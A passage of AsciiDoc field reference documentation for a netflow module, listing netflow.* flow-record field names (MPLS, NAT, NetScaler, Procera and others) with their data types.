+*`netflow.mean_flow_rate`*:: ++ +-- +type: long + +-- + +*`netflow.mean_packet_rate`*:: ++ +-- +type: long + +-- + +*`netflow.message_md5_checksum`*:: ++ +-- +type: short + +-- + +*`netflow.message_scope`*:: ++ +-- +type: short + +-- + +*`netflow.metering_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.metro_evc_id`*:: ++ +-- +type: keyword + +-- + +*`netflow.metro_evc_type`*:: ++ +-- +type: short + +-- + +*`netflow.mib_capture_time_semantics`*:: ++ +-- +type: short + +-- + +*`netflow.mib_context_engine_id`*:: ++ +-- +type: short + +-- + +*`netflow.mib_context_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.mib_index_indicator`*:: ++ +-- +type: long + +-- + +*`netflow.mib_module_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.mib_object_description`*:: ++ +-- +type: keyword + +-- + +*`netflow.mib_object_identifier`*:: ++ +-- +type: short + +-- + +*`netflow.mib_object_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.mib_object_syntax`*:: ++ +-- +type: keyword + +-- + +*`netflow.mib_object_value_bits`*:: ++ +-- +type: short + +-- + +*`netflow.mib_object_value_counter`*:: ++ +-- +type: long + +-- + +*`netflow.mib_object_value_gauge`*:: ++ +-- +type: long + +-- + +*`netflow.mib_object_value_integer`*:: ++ +-- +type: integer + +-- + +*`netflow.mib_object_value_ip_address`*:: ++ +-- +type: ip + +-- + +*`netflow.mib_object_value_octet_string`*:: ++ +-- +type: short + +-- + +*`netflow.mib_object_value_oid`*:: ++ +-- +type: short + +-- + +*`netflow.mib_object_value_time_ticks`*:: ++ +-- +type: long + +-- + +*`netflow.mib_object_value_unsigned`*:: ++ +-- +type: long + +-- + +*`netflow.mib_sub_identifier`*:: ++ +-- +type: long + +-- + +*`netflow.min_export_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.min_flow_start_microseconds`*:: ++ +-- +type: date + +-- + +*`netflow.min_flow_start_milliseconds`*:: ++ +-- +type: date + +-- + +*`netflow.min_flow_start_nanoseconds`*:: ++ +-- +type: date + +-- + +*`netflow.min_flow_start_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.minimum_ip_total_length`*:: ++ +-- +type: long + +-- + +*`netflow.minimum_layer2_total_length`*:: ++ +-- +type: long + +-- + +*`netflow.minimum_ttl`*:: ++ +-- +type: short + +-- + +*`netflow.mobile_imsi`*:: ++ +-- +type: keyword + +-- + +*`netflow.mobile_msisdn`*:: ++ +-- +type: keyword + +-- + +*`netflow.monitoring_interval_end_milli_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.monitoring_interval_start_milli_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.mpls_label_stack_depth`*:: ++ +-- +type: long + +-- + +*`netflow.mpls_label_stack_length`*:: ++ +-- +type: long + +-- + +*`netflow.mpls_label_stack_section`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section10`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section2`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section3`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section4`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section5`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section6`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section7`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section8`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_label_stack_section9`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_payload_length`*:: ++ +-- +type: long + +-- + +*`netflow.mpls_payload_packet_section`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_top_label_exp`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_top_label_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.mpls_top_label_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.mpls_top_label_prefix_length`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_top_label_stack_section`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_top_label_ttl`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_top_label_type`*:: ++ +-- +type: short + +-- + +*`netflow.mpls_vpn_route_distinguisher`*:: ++ +-- +type: short + +-- + +*`netflow.mptcp_address_id`*:: ++ +-- +type: short + +-- + +*`netflow.mptcp_flags`*:: ++ +-- +type: short + +-- + +*`netflow.mptcp_initial_data_sequence_number`*:: ++ +-- +type: long + +-- + +*`netflow.mptcp_maximum_segment_size`*:: ++ +-- +type: integer + +-- + +*`netflow.mptcp_receiver_token`*:: ++ +-- +type: long + +-- + +*`netflow.multicast_replication_factor`*:: ++ +-- +type: long + +-- + +*`netflow.nat_event`*:: ++ +-- +type: short + +-- + +*`netflow.nat_inside_svcid`*:: ++ +-- +type: integer + +-- + +*`netflow.nat_instance_id`*:: ++ +-- +type: long + +-- + +*`netflow.nat_originating_address_realm`*:: ++ +-- +type: short + +-- + +*`netflow.nat_outside_svcid`*:: ++ +-- +type: integer + +-- + +*`netflow.nat_pool_id`*:: ++ +-- +type: long + +-- + +*`netflow.nat_pool_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.nat_quota_exceeded_event`*:: ++ +-- +type: long + +-- + +*`netflow.nat_sub_string`*:: ++ +-- +type: keyword + +-- + +*`netflow.nat_threshold_event`*:: ++ +-- +type: long + +-- + +*`netflow.nat_type`*:: ++ +-- +type: short + +-- + +*`netflow.netscale_ica_client_version`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_aaa_username`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_app_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_app_name_app_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_app_name_incarnation_number`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_app_template_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_app_unit_name_app_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_application_startup_duration`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_application_startup_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_cache_redir_client_connection_core_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_cache_redir_client_connection_transaction_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_client_rtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_connection_chain_hop_count`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_connection_chain_id`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_connection_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_current_license_consumed`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_db_clt_host_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_db_database_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_db_login_flags`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_db_protocol_name`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_db_req_string`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_db_req_type`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_db_resp_length`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_db_resp_status`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_db_resp_status_string`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_db_user_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_flow_flags`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_client_interaction_end_time`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_client_interaction_start_time`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_client_render_end_time`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_client_render_start_time`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_content_type`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_domain_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_authorization`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_cookie`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_forw_fb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_req_forw_lb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_req_host`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_method`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_rcv_fb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_req_rcv_lb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_req_referer`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_url`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_user_agent`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_via`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_req_xforwarded_for`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_res_forw_fb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_res_forw_lb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_res_location`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_res_rcv_fb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_res_rcv_lb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_res_set_cookie`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_res_set_cookie2`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_http_rsp_len`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_http_rsp_status`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_app_module_path`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_ica_app_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_application_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_ica_application_termination_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_application_termination_type`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_channel_id1`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id1_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id2`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id2_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id3`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id3_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id4`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id4_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id5`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_channel_id5_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_client_host_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_ica_client_ip`*:: ++ +-- +type: ip + +-- + +*`netflow.netscaler_ica_client_launcher`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_client_side_rto_count`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_client_side_window_size`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_client_type`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_clientside_delay`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_clientside_jitter`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_clientside_packets_retransmit`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_clientside_rtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_clientside_rx_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_clientside_srtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_clientside_tx_bytes`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_connection_priority`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_device_serial_no`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_domain_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_ica_flags`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_host_delay`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_l7_client_latency`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_l7_server_latency`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_launch_mechanism`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_network_update_end_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_network_update_start_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_rtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_server_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_ica_server_side_rto_count`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_server_side_window_size`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_serverside_delay`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_serverside_jitter`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_serverside_packets_retransmit`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_ica_serverside_rtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_serverside_srtt`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_session_end_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_session_guid`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_ica_session_reconnects`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_ica_session_setup_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_session_update_begin_sec`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_session_update_end_sec`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_ica_username`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_license_type`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_main_page_core_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_main_page_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_max_license_count`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_msi_client_cookie`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_round_trip_time`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_server_ttfb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_server_ttlb`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_syslog_message`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_syslog_priority`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_syslog_timestamp`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_transaction_id`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown270`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown271`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown272`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown273`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown274`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown275`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown276`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown277`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown278`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown279`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown280`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown281`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown282`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown283`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown284`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown285`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown286`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown287`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown288`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown289`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown290`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown291`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown292`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown293`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown294`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown295`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown296`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown297`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown298`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown299`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown300`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown301`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown302`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown303`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown304`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown305`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown306`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown307`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown308`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown309`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown310`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown311`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown312`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown313`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown314`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown315`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown316`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown317`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown318`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown319`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown320`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown321`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown322`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown323`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown324`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown325`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown326`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown327`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown328`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown329`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown330`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown331`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown332`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown333`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown334`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown335`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown336`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown337`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown338`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown339`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown340`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown341`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown342`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown343`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown344`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown345`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown346`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown347`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown348`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown349`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown350`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown351`*:: ++ +-- +type: keyword + +-- + +*`netflow.netscaler_unknown352`*:: ++ +-- +type: integer + +-- + +*`netflow.netscaler_unknown353`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown354`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown355`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown356`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown357`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown363`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_unknown383`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_unknown391`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown398`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown404`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown405`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown427`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown429`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_unknown432`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_unknown433`*:: ++ +-- +type: short + +-- + +*`netflow.netscaler_unknown453`*:: ++ +-- +type: long + +-- + +*`netflow.netscaler_unknown465`*:: ++ +-- +type: long + +-- + +*`netflow.new_connection_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.next_header_ipv6`*:: ++ +-- +type: short + +-- + +*`netflow.non_empty_packet_count`*:: ++ +-- +type: long + +-- + +*`netflow.not_sent_flow_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.not_sent_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.not_sent_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.not_sent_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.observation_domain_id`*:: ++ +-- +type: long + +-- + +*`netflow.observation_domain_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.observation_point_id`*:: ++ +-- +type: long + +-- + +*`netflow.observation_point_type`*:: ++ +-- +type: short + +-- + +*`netflow.observation_time_microseconds`*:: ++ +-- +type: date + +-- + +*`netflow.observation_time_milliseconds`*:: ++ +-- +type: date + +-- + +*`netflow.observation_time_nanoseconds`*:: ++ +-- +type: date + +-- + +*`netflow.observation_time_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.observed_flow_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.octet_delta_sum_of_squares`*:: ++ +-- +type: long + +-- + +*`netflow.octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.octet_total_sum_of_squares`*:: ++ +-- +type: long + +-- + +*`netflow.opaque_octets`*:: ++ +-- +type: short + +-- + +*`netflow.original_exporter_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.original_exporter_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.original_flows_completed`*:: ++ +-- +type: long + +-- + +*`netflow.original_flows_initiated`*:: ++ +-- +type: long + +-- + +*`netflow.original_flows_present`*:: ++ +-- +type: long + +-- + +*`netflow.original_observation_domain_id`*:: ++ +-- +type: long + +-- + +*`netflow.os_finger_print`*:: ++ +-- +type: keyword + +-- + +*`netflow.os_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.os_version`*:: ++ +-- +type: keyword + +-- + +*`netflow.p2p_technology`*:: ++ +-- +type: keyword + +-- + +*`netflow.packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.padding_octets`*:: ++ +-- +type: short + +-- + +*`netflow.payload`*:: ++ +-- +type: keyword + +-- + +*`netflow.payload_entropy`*:: ++ +-- +type: short + +-- + +*`netflow.payload_length_ipv6`*:: ++ +-- +type: integer + +-- + +*`netflow.policy_qos_classification_hierarchy`*:: ++ +-- +type: long + +-- + +*`netflow.policy_qos_queue_index`*:: ++ +-- +type: long + +-- + +*`netflow.policy_qos_queuedrops`*:: ++ +-- +type: long + +-- + +*`netflow.policy_qos_queueindex`*:: ++ +-- +type: long + +-- + +*`netflow.port_id`*:: ++ +-- +type: long + +-- + +*`netflow.port_range_end`*:: ++ +-- +type: integer + +-- + +*`netflow.port_range_num_ports`*:: ++ +-- +type: integer + +-- + +*`netflow.port_range_start`*:: ++ +-- +type: integer + +-- + +*`netflow.port_range_step_size`*:: ++ +-- +type: integer + +-- + +*`netflow.post_destination_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.post_dot1q_customer_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.post_dot1q_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.post_ip_class_of_service`*:: ++ +-- +type: short + +-- + +*`netflow.post_ip_diff_serv_code_point`*:: ++ +-- +type: short + +-- + +*`netflow.post_ip_precedence`*:: ++ +-- +type: short + +-- + +*`netflow.post_layer2_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_layer2_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mcast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_mpls_top_label_exp`*:: ++ +-- +type: short + +-- + +*`netflow.post_napt_destination_transport_port`*:: ++ +-- +type: integer + +-- + +*`netflow.post_napt_source_transport_port`*:: ++ +-- +type: integer + +-- + +*`netflow.post_nat_destination_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.post_nat_destination_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.post_nat_source_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.post_nat_source_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.post_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.post_source_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.post_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.private_enterprise_number`*:: ++ +-- +type: long + +-- + +*`netflow.procera_apn`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_base_service`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_content_categories`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_device_id`*:: ++ +-- +type: long + +-- + +*`netflow.procera_external_rtt`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_flow_behavior`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_ggsn`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_content_type`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_file_length`*:: ++ +-- +type: long + +-- + +*`netflow.procera_http_language`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_location`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_referer`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_request_method`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_request_version`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_response_status`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_http_url`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_http_user_agent`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_imsi`*:: ++ +-- +type: long + +-- + +*`netflow.procera_incoming_octets`*:: ++ +-- +type: long + +-- + +*`netflow.procera_incoming_packets`*:: ++ +-- +type: long + +-- + +*`netflow.procera_incoming_shaping_drops`*:: ++ +-- +type: long + +-- + +*`netflow.procera_incoming_shaping_latency`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_internal_rtt`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_local_ipv4_host`*:: ++ +-- +type: ip + +-- + +*`netflow.procera_local_ipv6_host`*:: ++ +-- +type: ip + +-- + +*`netflow.procera_msisdn`*:: ++ +-- +type: long + +-- + +*`netflow.procera_outgoing_octets`*:: ++ +-- +type: long + +-- + +*`netflow.procera_outgoing_packets`*:: ++ +-- +type: long + +-- + +*`netflow.procera_outgoing_shaping_drops`*:: ++ +-- +type: long + +-- + +*`netflow.procera_outgoing_shaping_latency`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_property`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_qoe_incoming_external`*:: ++ +-- +type: float + +-- + +*`netflow.procera_qoe_incoming_internal`*:: ++ +-- +type: float + +-- + +*`netflow.procera_qoe_outgoing_external`*:: ++ +-- +type: float + +-- + +*`netflow.procera_qoe_outgoing_internal`*:: 